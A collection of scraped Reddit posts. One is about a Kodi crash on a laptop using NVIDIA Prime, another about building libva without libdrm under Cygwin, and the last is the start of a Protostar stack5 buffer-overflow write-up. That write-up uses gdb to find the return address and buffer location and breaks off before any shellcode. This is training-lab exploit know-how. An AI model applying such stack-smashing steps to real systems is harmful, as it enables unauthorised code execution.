I use a bash script that makes xrandr output to my integrated display using nvidia. (I've used this guide Glorious Eggroll Arch NVIDIA Prime) I guess GM108M doesn't have a video decoder but I am able to watch videos on my computer still, even though I use my NVIDIA GPU at all times. Is there any sort of workaround to launch up Kodi? The following are my GPUs, my bash script, Xorg config, Kodi output, and crash log.
> lspci -nn | grep NVIDIA 01:00.0 3D controller [0302]: NVIDIA Corporation GM108M [GeForce 930M] [10de:1346] (rev a2) 

> lspci -k | grep -A 2 -E "(VGA|3D)" 00:02.0 VGA compatible controller: Intel Corporation Skylake GT2 [HD Graphics 520] (rev 07) Subsystem: Toshiba Corporation Skylake GT2 [HD Graphics 520] Kernel driver in use: i915 -- 01:00.0 3D controller: NVIDIA Corporation GM108M [GeForce 930M] (rev a2) Subsystem: Toshiba Corporation GM108M [GeForce 930M] Kernel driver in use: nvidia 

> cat /etc/X11/xorg.conf Section "Module" Load "modesetting" EndSection Section "Device" Identifier "nvidia" Driver "nvidia" BusID "PCI:1:0:0" Option "AllowEmptyInitialConfiguration" EndSection 

> cat /etc/X11/xinit/xinitrc.d/nvidia-script.sh #!/bin/sh xrandr --setprovideroutputsource modesetting NVIDIA-0 xrandr --auto 

> kodi GPU at BusId 0x1 doesn't have a supported video decoder /usbin/kodi: line 219: 1996 Floating point exception(core dumped) ${KODI_BINARY} $SAVED_ARGS Crash report available at /[ehem]/[ehem]/kodi_crashlog-20200419_232209.log 

> cat /[ehem]/[ehem]/kodi_crashlog-20200419_232209.log ############## Kodi CRASH LOG ############### ################ SYSTEM INFO ################ Date: Sun 19 Apr 2020 11:22:09 PM +03 Kodi Options: Arch: x86_64 Kernel: Linux 5.6.3-arch1-1 #1 SMP PREEMPT Wed, 08 Apr 2020 07:47:16 +0000 Release: Arch Linux ############## END SYSTEM INFO ############## ############### STACK TRACE ################# gdb not installed, can't get stack trace. ############# END STACK TRACE ############### ################# LOG FILE ################## 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: ----------------------------------------------------------------------- 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Starting Kodi (18.6 Git:20200229-nogitfound). Platform: Linux x86 64-bit 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Using Release Kodi x64 build 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Kodi compiled 2020-02-29 by GCC 9.2.1 for Linux x86 64-bit version 5.4.17 (328721) 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Running on Arch Linux rolling, kernel: Linux x86 64-bit version 5.6.3-arch1-1 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: FFmpeg version/source: 4.0.4-Kodi 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Host CPU: Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz, 4 cores available 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://xbmc/ is mapped to: /usshare/kodi 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://xbmcbin/ is mapped to: /uslib/kodi 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://xbmcbinaddons/ is mapped to: /uslib/kodi/addons 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://masterprofile/ is mapped to: /[ehem]/[ehem]/.kodi/userdata 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://envhome/ is mapped to: /[ehem]/[ehem] 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://home/ is mapped to: /[ehem]/[ehem]/.kodi 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://temp/ is mapped to: /[ehem]/[ehem]/.kodi/temp 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://logpath/ is mapped to: /[ehem]/[ehem]/.kodi/temp 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: The executable running is: /uslib/kodi/kodi-x11 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Local hostname: tardis 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Log File is located: /[ehem]/[ehem]/.kodi/temp/kodi.log 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: ----------------------------------------------------------------------- 2020-04-19 23:22:08.246 T:140197124628672 INFO: loading settings 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://profile/ is mapped to: special://masterprofile/ 2020-04-19 23:22:08.252 T:140197124628672 DEBUG: CSkinSettings: no  tag found 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: No settings file to load (special://xbmc/system/advancedsettings.xml) 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: No settings file to load (special://masterprofile/advancedsettings.xml) 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: Default Video Player: VideoPlayer 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: Default Audio Player: paplayer 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: Disabled debug logging due to GUI setting. Level 0. 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: Log level changed to "LOG_LEVEL_NORMAL" 2020-04-19 20:22:08.257 T:140197124628672 NOTICE: PulseAudio: Server found running - will try to use Pulse 2020-04-19 20:22:08.258 T:140197124628672 NOTICE: Running database version Addons27 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: audioencoder.kodi.builtin.aac v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: audioencoder.kodi.builtin.wma v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: game.controller.default v1.0.8 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: game.controller.snes v1.0.8 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.audioengine v1.0.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.filesystem v1.0.2 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.general v1.0.3 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.gui v5.12.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.main v1.0.14 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.network v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.audiodecoder v2.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.audioencoder v2.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.game v1.1.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.imagedecoder v2.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.inputstream v2.0.8 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.peripheral v1.3.7 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.pvr v5.10.3 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.screensaver v2.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.vfs v2.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.videocodec v1.0.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.visualization v2.0.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.resource v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.album.universal v3.1.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.artists.universal v4.3.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.allmusic.com v3.2.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.fanart.tv v3.6.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.imdb.com v3.1.4 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.musicbrainz.org v2.2.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.theaudiodb.com v2.0.2 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.themoviedb.org v3.1.9 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.local v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.themoviedb.org v5.1.7 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.tvshows.themoviedb.org v3.1.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: repository.xbmc.org v3.1.6 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: resource.images.weathericons.default v1.1.8 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: resource.language.en_gb v2.0.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: resource.uisounds.kodi v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: screensaver.xbmc.builtin.black v1.0.33 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: screensaver.xbmc.builtin.dim v1.0.59 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: script.module.pil v1.1.7 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: script.module.pycryptodome v3.4.3 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: service.xbmc.versioncheck v0.4.6 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: skin.estouchy v2.0.28 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: skin.estuary v2.0.27 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: webinterface.default v18.x-2.4.6 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.addon v18.6.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.core v0.1.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.gui v5.14.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.json v10.3.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.metadata v2.1.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.python v2.26.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.webinterface v1.0.0 installed 2020-04-19 20:22:08.282 T:140197124628672 ERROR: DBus error: org.freedesktop.DBus.Error.InvalidArgs - No such property “OnLowBattery” 2020-04-19 20:22:08.284 T:140197107828480 WARNING: Pulseaudio module module-allow-passthrough not loaded - opening PT devices might fail 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: Found 1 Lists of Devices 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: Enumerated PULSE devices: 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: Device 1 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_deviceName : Default 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_displayName : Default 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_displayNameExtra: Default Output Device (PULSEAUDIO) 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_deviceType : AE_DEVTYPE_PCM 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_channels : FL, FR 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_sampleRates : 5512,8000,11025,16000,22050,32000,44100,48000,64000,88200,96000,176400,192000,384000 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_dataFormats : AE_FMT_U8,AE_FMT_S16NE,AE_FMT_S24NE3,AE_FMT_S24NE4,AE_FMT_S32NE,AE_FMT_FLOAT 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_streamTypes : No passthrough capabilities 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: Device 2 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_deviceName : alsa_output.pci-0000_00_1f.3.analog-stereo 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_displayName : Built-in Audio Analog Stereo 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_displayNameExtra: Speakers (PULSEAUDIO) 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_deviceType : AE_DEVTYPE_PCM 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_channels : FL, FR 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_sampleRates : 5512,8000,11025,16000,22050,32000,44100,48000,64000,88200,96000,176400,192000,384000 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_dataFormats : AE_FMT_U8,AE_FMT_S16NE,AE_FMT_S24NE3,AE_FMT_S24NE4,AE_FMT_S32NE,AE_FMT_FLOAT 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_streamTypes : No passthrough capabilities 2020-04-19 20:22:08.286 T:140197099435776 NOTICE: PulseAudio: Opened device Default in pcm mode with Buffersize 150 ms 2020-04-19 20:22:08.483 T:140197124628672 NOTICE: Checking resolution 16 2020-04-19 20:22:08.545 T:140197124628672 NOTICE: Using visual 0x21 ############### END LOG FILE ################ ############ END Kodi CRASH LOG ############# 
Thanks a lot, guys.
submitted by aembra to archlinux [link] [comments]

Building libva and disabling libdrm

I've been struggling with this for a few days now and honestly I don't know where to turn. I've had success getting a clean build of ffmpeg with ha few dependencies via cygwin, but I'm having trouble getting it with libmfx/QuickSync enabled.
In order to get ffmpeg built with libmfx I need to build the msdk, or Intel Media SDK. In turn, the msdk has dependency on libva, which needs libdrm to access the drm infrastructure of the linux kernel. Here's where it get's rough. libdrm just doesn't exist on windows, there's no infrastructure for it to make any sense. And so, it's not available as a package or a separate lib for cygwin.
In order for me to get this to work, I'd need to find a way to tell libva, maybe through configure options/flags, to not use drm. How can I achieve that?
Here's my libva make command:
cd /ffmpeg_sources && rm -rf libva && git clone https://github.com/intel/libva libva && cd libva && CFLAGS=-I/usx86_64-w64-mingw32/sys-root/mingw/include && LDFLAGS=-L/usx86_64-w64-mingw32/sys-root/mingw/lib && export LD_LIBRARY_PATH=/ffmpeg_sources/libva/ && export PKG_CONFIG_LIBDIR=/usx86_64-w64-mingw32/sys-root/mingw/lib/pkgconfig && export PKG_CONFIG_PATH=/usx86_64-w64-mingw32/sys-root/mingw/lib/pkgconfig && ./autogen.sh --prefix=/uslocal --libdir=/usx86_64-w64-mingw32/sys-root/mingw/lib --enable-static --disable-shared && make -j$(nproc) && make install 
Here's the log for it:
autoreconf-2.69: Entering directory `.' autoreconf-2.69: configure.ac: not using Gettext autoreconf-2.69: running: aclocal -I m4 ${ACLOCAL_FLAGS} autoreconf-2.69: configure.ac: tracing autoreconf-2.69: running: libtoolize --copy autoreconf-2.69: running: /usbin/autoconf-2.69 autoreconf-2.69: running: /usbin/autoheader-2.69 autoreconf-2.69: running: automake --add-missing --copy --no-force va/wayland/Makefile.am:30: warning: source file '../drm/va_drm_utils.c' is in a subdirectory, va/wayland/Makefile.am:30: but option 'subdir-objects' is disabled automake-1.16: warning: possible forward-incompatibility. automake-1.16: At least a source file is in a subdirectory, but the 'subdir-objects' automake-1.16: automake option hasn't been enabled. For now, the corresponding output automake-1.16: object file(s) will be placed in the top-level directory. However, automake-1.16: this behaviour will change in future Automake versions: they will automake-1.16: unconditionally cause object files to be placed in the same subdirectory automake-1.16: of the corresponding sources. automake-1.16: You are advised to start using 'subdir-objects' option throughout your automake-1.16: project, to avoid future incompatibilities. autoreconf-2.69: Leaving directory `.' checking for a BSD-compatible install... /usbin/install -c checking whether build environment is sane... yes checking for a thread-safe mkdir -p... /usbin/mkdir -p checking for gawk... gawk checking whether make sets $(MAKE)... yes checking whether make supports nested variables... yes checking whether make supports nested variables... (cached) yes checking build system type... x86_64-pc-cygwin checking host system type... x86_64-pc-cygwin checking how to print strings... printf checking whether make supports the include directive... yes (GNU style) checking for gcc... gcc checking whether the C compiler works... yes checking for C compiler default output file name... a.exe checking for suffix of executables... .exe checking whether we are cross compiling... no checking for suffix of object files... o checking whether we are using the GNU C compiler... yes checking whether gcc accepts -g... yes checking for gcc option to accept ISO C89... none needed checking whether gcc understands -c and -o together... yes checking dependency style of gcc... gcc3 checking for a sed that does not truncate output... /usbin/sed checking for grep that handles long lines and -e... /usbin/grep checking for egrep... /usbin/grep -E checking for fgrep... /usbin/grep -F checking for ld used by gcc... /usx86_64-pc-cygwin/bin/ld.exe checking if the linker (/usx86_64-pc-cygwin/bin/ld.exe) is GNU ld... yes checking for BSD- or MS-compatible name lister (nm)... /usbin/nm -B checking the name lister (/usbin/nm -B) interface... BSD nm checking whether ln -s works... yes checking the maximum length of command line arguments... 8192 checking how to convert x86_64-pc-cygwin file names to x86_64-pc-cygwin format... func_convert_file_noop checking how to convert x86_64-pc-cygwin file names to toolchain format... func_convert_file_noop checking for /usx86_64-pc-cygwin/bin/ld.exe option to reload object files... -r checking for objdump... objdump checking how to recognize dependent libraries... file_magic ^x86 archive import|^x86 DLL checking for dlltool... dlltool checking how to associate runtime and link libraries... func_cygming_dll_for_implib checking for ar... ar checking for archiver @FILE support... @ checking for strip... strip checking for ranlib... ranlib checking command to parse /usbin/nm -B output from gcc object... ok checking for sysroot... no checking for a working dd... /usbin/dd checking how to truncate binary pipes... /usbin/dd bs=4096 count=1 checking for mt... no checking if : is a manifest tool... no checking how to run the C preprocessor... gcc -E checking for ANSI C header files... yes checking for sys/types.h... yes checking for sys/stat.h... yes checking for stdlib.h... yes checking for string.h... yes checking for memory.h... yes checking for strings.h... yes checking for inttypes.h... yes checking for stdint.h... yes checking for unistd.h... yes checking for dlfcn.h... yes checking for objdir... .libs checking if gcc supports -fno-rtti -fno-exceptions... no checking for gcc option to produce PIC... -DDLL_EXPORT -DPIC checking if gcc PIC flag -DDLL_EXPORT -DPIC works... yes checking if gcc static flag -static works... yes checking if gcc supports -c -o file.o... yes checking if gcc supports -c -o file.o... (cached) yes checking whether the gcc linker (/usx86_64-pc-cygwin/bin/ld.exe) supports shared libraries... yes checking dynamic linker characteristics... Win32 ld.exe checking how to hardcode library paths into programs... immediate checking whether stripping libraries is possible... yes checking if libtool supports shared libraries... yes checking whether to build shared libraries... no checking whether to build static libraries... yes checking for gcc... (cached) gcc checking whether we are using the GNU C compiler... (cached) yes checking whether gcc accepts -g... (cached) yes checking for gcc option to accept ISO C89... (cached) none needed checking whether gcc understands -c and -o together... (cached) yes checking dependency style of gcc... (cached) gcc3 checking for g++... g++ checking whether we are using the GNU C++ compiler... yes checking whether g++ accepts -g... yes checking dependency style of g++... gcc3 checking how to run the C++ preprocessor... g++ -E checking for ld used by g++... /usx86_64-pc-cygwin/bin/ld.exe checking if the linker (/usx86_64-pc-cygwin/bin/ld.exe) is GNU ld... yes checking whether the g++ linker (/usx86_64-pc-cygwin/bin/ld.exe) supports shared libraries... yes checking for g++ option to produce PIC... -DDLL_EXPORT -DPIC checking if g++ PIC flag -DDLL_EXPORT -DPIC works... yes checking if g++ static flag -static works... yes checking if g++ supports -c -o file.o... yes checking if g++ supports -c -o file.o... (cached) yes checking whether the g++ linker (/usx86_64-pc-cygwin/bin/ld.exe) supports shared libraries... yes checking dynamic linker characteristics... Win32 ld.exe checking how to hardcode library paths into programs... immediate checking for a sed that does not truncate output... (cached) /usbin/sed checking for pkg-config... /usbin/pkg-config checking pkg-config is at least version 0.9.0... yes checking for ANSI C header files... (cached) yes checking for special C compiler options needed for large files... no checking for _FILE_OFFSET_BITS value needed for large files... no checking whether __attribute__((visibility())) is supported... no checking whether gcc accepts -fstack-protector... yes checking for DRM... no configure: error: Package requirements (libdrm >= 2.4) were not met: Package 'libdrm', required by 'virtual:world', not found Consider adjusting the PKG_CONFIG_PATH environment variable if you installed software in a non-standard prefix. Alternatively, you may set the environment variables DRM_CFLAGS and DRM_LIBS to avoid the need to call pkg-config. See the pkg-config man page for more details. 
Edit:
Disabling DRM, if I've done it correctly, got me nowhere.
submitted by hiihiiii to linuxquestions [link] [comments]

05-24 03:24 - 'Building libva in while disabling libdrm' (self.linux) by /u/hiihiiii removed from /r/linux within 276-286min

'''
I've been struggling with this for a few days now and honestly I don't know where to turn. I've had success getting a clean build of ffmpeg with ha few dependencies via cygwin, but I'm having trouble getting it with libmfx/QuickSync enabled.
In order to get ffmpeg built with libmfx I need to build the msdk, or Intel Media SDK. In turn, the msdk has dependency on libva, which needs libdrm to access the drm infrastructure of the linux kernel. Here's where it get's rough. libdrm just doesn't exist on windows, there's no infrastructure for it to make any sense. And so, it's not available as a package or a separate lib for cygwin.
In order for me to get this to work, I'd need to find a way to tell libva, maybe through configure options/flags, to not use drm. How can I achieve that?
Here's my libva make command:
cd /ffmpeg_sources && rm -rf libva && git clone [link]^^1 libva && cd libva && CFLAGS=-I/usx86_64-w64-mingw32/sys-root/mingw/include && LDFLAGS=-L/usx86_64-w64-mingw32/sys-root/mingw/lib && export LD_LIBRARY_PATH=/ffmpeg_sources/libva/ && export PKG_CONFIG_LIBDIR=/usx86_64-w64-mingw32/sys-root/mingw/lib/pkgconfig && export PKG_CONFIG_PATH=/usx86_64-w64-mingw32/sys-root/mingw/lib/pkgconfig && ./autogen.sh --prefix=/uslocal --libdir=/usx86_64-w64-mingw32/sys-root/mingw/lib --enable-static --disable-shared && make -j$(nproc) && make install 
Here's the log for it:
autoreconf-2.69: Entering directory `.' autoreconf-2.69: configure.ac: not using Gettext autoreconf-2.69: running: aclocal -I m4 ${ACLOCAL_FLAGS} autoreconf-2.69: configure.ac: tracing autoreconf-2.69: running: libtoolize --copy autoreconf-2.69: running: /usbin/autoconf-2.69 autoreconf-2.69: running: /usbin/autoheader-2.69 autoreconf-2.69: running: automake --add-missing --copy --no-force va/wayland/Makefile.am:30: warning: source file '../drm/va_drm_utils.c' is in a subdirectory, va/wayland/Makefile.am:30: but option 'subdir-objects' is disabled automake-1.16: warning: possible forward-incompatibility. automake-1.16: At least a source file is in a subdirectory, but the 'subdir-objects' automake-1.16: automake option hasn't been enabled. For now, the corresponding output automake-1.16: object file(s) will be placed in the top-level directory. However, automake-1.16: this behaviour will change in future Automake versions: they will automake-1.16: unconditionally cause object files to be placed in the same subdirectory automake-1.16: of the corresponding sources. automake-1.16: You are advised to start using 'subdir-objects' option throughout your automake-1.16: project, to avoid future incompatibilities. autoreconf-2.69: Leaving directory `.' checking for a BSD-compatible install... /usbin/install -c checking whether build environment is sane... yes checking for a thread-safe mkdir -p... /usbin/mkdir -p checking for gawk... gawk checking whether make sets $(MAKE)... yes checking whether make supports nested variables... yes checking whether make supports nested variables... (cached) yes checking build system type... x86_64-pc-cygwin checking host system type... x86_64-pc-cygwin checking how to print strings... printf checking whether make supports the include directive... yes (GNU style) checking for gcc... gcc checking whether the C compiler works... yes checking for C compiler default output file name... a.exe checking for suffix of executables... .exe checking whether we are cross compiling... no checking for suffix of object files... o checking whether we are using the GNU C compiler... yes checking whether gcc accepts -g... yes checking for gcc option to accept ISO C89... none needed checking whether gcc understands -c and -o together... yes checking dependency style of gcc... gcc3 checking for a sed that does not truncate output... /usbin/sed checking for grep that handles long lines and -e... /usbin/grep checking for egrep... /usbin/grep -E checking for fgrep... /usbin/grep -F checking for ld used by gcc... /usx86_64-pc-cygwin/bin/ld.exe checking if the linker (/usx86_64-pc-cygwin/bin/ld.exe) is GNU ld... yes checking for BSD- or MS-compatible name lister (nm)... /usbin/nm -B checking the name lister (/usbin/nm -B) interface... BSD nm checking whether ln -s works... yes checking the maximum length of command line arguments... 8192 checking how to convert x86_64-pc-cygwin file names to x86_64-pc-cygwin format... func_convert_file_noop checking how to convert x86_64-pc-cygwin file names to toolchain format... func_convert_file_noop checking for /usx86_64-pc-cygwin/bin/ld.exe option to reload object files... -r checking for objdump... objdump checking how to recognize dependent libraries... file_magic ^x86 archive import|^x86 DLL checking for dlltool... dlltool checking how to associate runtime and link libraries... func_cygming_dll_for_implib checking for ar... ar checking for archiver @FILE support... @ checking for strip... strip checking for ranlib... ranlib checking command to parse /usbin/nm -B output from gcc object... ok checking for sysroot... no checking for a working dd... /usbin/dd checking how to truncate binary pipes... /usbin/dd bs=4096 count=1 checking for mt... no checking if : is a manifest tool... no checking how to run the C preprocessor... gcc -E checking for ANSI C header files... yes checking for sys/types.h... yes checking for sys/stat.h... yes checking for stdlib.h... yes checking for string.h... yes checking for memory.h... yes checking for strings.h... yes checking for inttypes.h... yes checking for stdint.h... yes checking for unistd.h... yes checking for dlfcn.h... yes checking for objdir... .libs checking if gcc supports -fno-rtti -fno-exceptions... no checking for gcc option to produce PIC... -DDLL_EXPORT -DPIC checking if gcc PIC flag -DDLL_EXPORT -DPIC works... yes checking if gcc static flag -static works... yes checking if gcc supports -c -o file.o... yes checking if gcc supports -c -o file.o... (cached) yes checking whether the gcc linker (/usx86_64-pc-cygwin/bin/ld.exe) supports shared libraries... yes checking dynamic linker characteristics... Win32 ld.exe checking how to hardcode library paths into programs... immediate checking whether stripping libraries is possible... yes checking if libtool supports shared libraries... yes checking whether to build shared libraries... no checking whether to build static libraries... yes checking for gcc... (cached) gcc checking whether we are using the GNU C compiler... (cached) yes checking whether gcc accepts -g... (cached) yes checking for gcc option to accept ISO C89... (cached) none needed checking whether gcc understands -c and -o together... (cached) yes checking dependency style of gcc... (cached) gcc3 checking for g++... g++ checking whether we are using the GNU C++ compiler... yes checking whether g++ accepts -g... yes checking dependency style of g++... gcc3 checking how to run the C++ preprocessor... g++ -E checking for ld used by g++... /usx86_64-pc-cygwin/bin/ld.exe checking if the linker (/usx86_64-pc-cygwin/bin/ld.exe) is GNU ld... yes checking whether the g++ linker (/usx86_64-pc-cygwin/bin/ld.exe) supports shared libraries... yes checking for g++ option to produce PIC... -DDLL_EXPORT -DPIC checking if g++ PIC flag -DDLL_EXPORT -DPIC works... yes checking if g++ static flag -static works... yes checking if g++ supports -c -o file.o... yes checking if g++ supports -c -o file.o... (cached) yes checking whether the g++ linker (/usx86_64-pc-cygwin/bin/ld.exe) supports shared libraries... yes checking dynamic linker characteristics... Win32 ld.exe checking how to hardcode library paths into programs... immediate checking for a sed that does not truncate output... (cached) /usbin/sed checking for pkg-config... /usbin/pkg-config checking pkg-config is at least version 0.9.0... yes checking for ANSI C header files... (cached) yes checking for special C compiler options needed for large files... no checking for _FILE_OFFSET_BITS value needed for large files... no checking whether __attribute__((visibility())) is supported... no checking whether gcc accepts -fstack-protector... yes checking for DRM... no configure: error: Package requirements (libdrm >= 2.4) were not met: Package 'libdrm', required by '[link]^^2 ', not found Consider adjusting the PKG_CONFIG_PATH environment variable if you installed software in a non-standard prefix. Alternatively, you may set the environment variables DRM_CFLAGS and DRM_LIBS to avoid the need to call pkg-config. See the pkg-config man page for more details. 
'''
Building libva in while disabling libdrm
Go1dfish undelete link
unreddit undelete link
Author: hiihiiii
1: gith*b*co*/intel/l***a 2: virtual:world
Unknown links are censored to prevent spreading illicit content.
submitted by removalbot to removalbot [link] [comments]

Protostar stack5 shellcode not working in the buffer (outside is ok)

Protostar Stack5 buffer overflow (32 bits shellcode)
I got a strange behaviour (strange maybe not BUT that I could not explain :-)
When I put the shellcode inside the buffer it does not work but when outside all is working fine.
It's protostart stack5 binary in it's original VM (constructed from Iso on linux 32 bits) so I would not give further info on the binary itself (stack is executable, ASLR is off, ....)
Let me explain and let's go with gdb !

Finding the buffer overflow
gdb$ disass _start Dump of assembler code for function _start: 0x08048310 <_start+0>: xor ebp,ebp 0x08048312 <_start+2>: pop esi 0x08048313 <_start+3>: mov ecx,esp 0x08048315 <_start+5>: and esp,0xfffffff0 0x08048318 <_start+8>: push eax 0x08048319 <_start+9>: push esp 0x0804831a <_start+10>: push edx 0x0804831b <_start+11>: push 0x80483e0 0x08048320 <_start+16>: push 0x80483f0 0x08048325 <_start+21>: push ecx 0x08048326 <_start+22>: push esi 0x08048327 <_start+23>: push 0x80483c4 # Real Entry point 0x0804832c <_start+28>: call 0x80482f8 <[email protected]> 0x08048331 <_start+33>: hlt 0x08048332 <_start+34>: nop 0x08048333 <_start+35>: nop (....) 
let's disass main
gdb$ disass main Dump of assembler code for function main: 0x080483c4 : push ebp # Prologue... 0x080483c5 : mov ebp,esp # ... 0x080483c7 : and esp,0xfffffff0 # ... adress alignement 0x080483ca : sub esp,0x50 # ... reserve space on stack 0x080483cd : lea eax,[esp+0x10] # adress start of buffer 0x080483d1 : mov DWORD PTR [esp],eax # put the arg on the stack 0x080483d4 : call 0x80482e8 [email protected] # call to gets (char*) 0x080483d9 : leave 0x080483da : ret End of assembler dump. 
Let's retrieve EBP adress and value:
gdb$ x/wx $ebp 0xbffff7b8: 0xbffff838 

Let's retrieve EIP address and it's value
gdb$ x/wx $ebp+0x4 0xbffff7bc: 0xb7eadc76 
Let's check EIP return adress to be sure we're fine:
gdb$ x/5i 0xb7eadc76 0xb7eadc76 <__libc_start_main+230>: mov DWORD PTR [esp],eax 0xb7eadc79 <__libc_start_main+233>: call 0xb7ec60c0 <*__GI_exit> 0xb7eadc7e <__libc_start_main+238>: xor ecx,ecx 0xb7eadc80 <__libc_start_main+240>: jmp 0xb7eadbc0 <__libc_start_main+48> 0xb7eadc85 <__libc_start_main+245>: mov eax,DWORD PTR [ebx+0x37d4] 
Good ! It's back on __libc_start_main.

Let's get the buffer (gets) start adress :
p/x $esp+0x10 $1 = 0xbffff770 

Write the most important values for our exploitation:
